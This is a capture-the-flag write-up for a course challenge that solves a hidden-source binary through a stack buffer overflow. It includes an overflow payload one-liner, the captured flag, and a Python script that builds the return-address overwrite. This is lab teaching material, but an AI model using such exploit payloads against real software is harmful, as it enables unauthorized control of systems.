This time the code is hidden

Note: I originally attempted this with commit #a798f95, but since then there has been an updated version, available here.

Analysis

We’ll need to find two things:

1) The length of the buffer
2) The function address of win

Buffer Length

An input of 76 characters is the first length that gives us a segfault, so the saved return address probably starts 76 bytes from the beginning of the buffer (the buffer itself, plus the saved frame pointer and any padding the compiler inserted). So later, when we overflow the buffer, we will need to prepend 76 (arbitrary) characters of padding before the address we want to jump to.

Function pointer address

As we don’t have any source code, we’ll need to inspect the executable file itself to find the address of win. Disassembling with objdump and grepping for the symbol name works because the binary has not been stripped of its symbol table.

$> objdump -d blind | grep win

---

080484d6 <win>:

Cool, so win is at 0x080484d6. On x86 the address has to be written into the payload least-significant byte first (little-endian), so 0x080484d6 becomes the byte string "\xd6\x84\x04\x08".

Putting these together…

$> python -c 'print("A" * 76 + "\x06\x85\x04\x08")'  | aslr ./blind

---

This is almost exactly the same as jump...
COMP6841{Ooh_Youre_Good}Segmentation fault

Two things worth noting. First, the address bytes in this payload encode 0x08048506, not the 0x080484d6 found above: the address of win depends on which build of the binary you are running (see the note about the updated version at the top), so always take it from objdump on the exact binary you are piping into. Second, the trailing "Segmentation fault" after the flag is expected: we entered win through a forged return address, so when win itself returns there is no valid address for it to go back to and the program crashes, but only after the flag has been printed. The one-liner also relies on Python 2, where print writes the string out as raw bytes; under Python 3 the non-ASCII characters (\x85 here, or \xd6 for the other address) would be UTF-8 encoded and the payload would no longer land correctly, so write the payload with sys.stdout.buffer.write(b"...") instead.
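As an added example (this is not the write-up's own code, nor anything shipped with the challenge), the following Python 3 script generalises both steps above. Instead of finding the offset by lengthening the input until the program crashes, it generates a cyclic pattern in which every 4-byte window is unique, so the EIP value seen in the crash (for example in gdb) gives the offset directly; it then packs the address of win little-endian with struct so the non-ASCII bytes survive Python 3. The offset of 76 and the address 0x080484d6 are taken from this write-up; the function eip_after_return is an assumed toy model of the 32-bit stack frame used only so the script can check itself offline, and the aslr wrapper is not needed because nothing here touches the real binary.

```python
import struct
import sys
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length: int) -> bytes:
    """Build a Metasploit-style cyclic pattern (Aa0Aa1Aa2...).

    Every 4-byte window of the pattern is unique for the first 20280 bytes,
    so the four bytes that end up in EIP after the crash identify exactly
    where the saved return address sits relative to the start of the buffer.
    """
    out = bytearray()
    for a in ascii_uppercase:
        for b in ascii_lowercase:
            for c in digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the unique part of the pattern")


def find_offset(pattern: bytes, eip: int) -> int:
    """Return the offset of the saved return address from the buffer start.

    eip is the 32-bit register value shown by the debugger at the crash.
    The CPU loaded it little-endian from the stack, so pack it back the same
    way before searching for it in the pattern that was sent to the program.
    """
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value does not come from the pattern")
    return idx


def build_payload(offset: int, win_addr: int) -> bytes:
    """offset bytes of padding, then the address of win, little-endian.

    struct.pack produces raw bytes, so bytes above 0x7f are written as-is
    (Python 2's print did this implicitly; Python 3's print would UTF-8
    encode them and corrupt the address).
    """
    return b"A" * offset + struct.pack("<I", win_addr)


def eip_after_return(data: bytes, offset: int) -> int:
    """Assumed toy model of the vulnerable frame (not the real binary).

    The input is copied from the start of the buffer without a length check,
    and the saved return address lives `offset` bytes in. Whatever four bytes
    of the input land there is what EIP becomes when the function returns.
    """
    if len(data) < offset + 4:
        raise ValueError("input too short to reach the return address")
    return struct.unpack("<I", data[offset:offset + 4])[0]


def solve(crash_offset: int = 76, win_addr: int = 0x080484D6) -> bytes:
    """Run the whole procedure against the toy frame and return the payload."""
    # Step 1: send a pattern, read EIP from the "crash", recover the offset.
    pattern = cyclic_pattern(200)
    eip = eip_after_return(pattern, crash_offset)
    offset = find_offset(pattern, eip)
    # Step 2: pad up to the return address and overwrite it with win.
    payload = build_payload(offset, win_addr)
    assert eip_after_return(payload, crash_offset) == win_addr
    return payload


if __name__ == "__main__":
    # Write raw bytes so the payload can be piped into the target:
    #   python3 exploit.py | ./blind
    sys.stdout.buffer.write(solve() + b"\n")
```

The only values that change from binary to binary are the two arguments of solve: the offset recovered from the crash and the address objdump reports for win. Pipe the script's output into the target exactly as the one-liner above is piped, substituting the address from your own build.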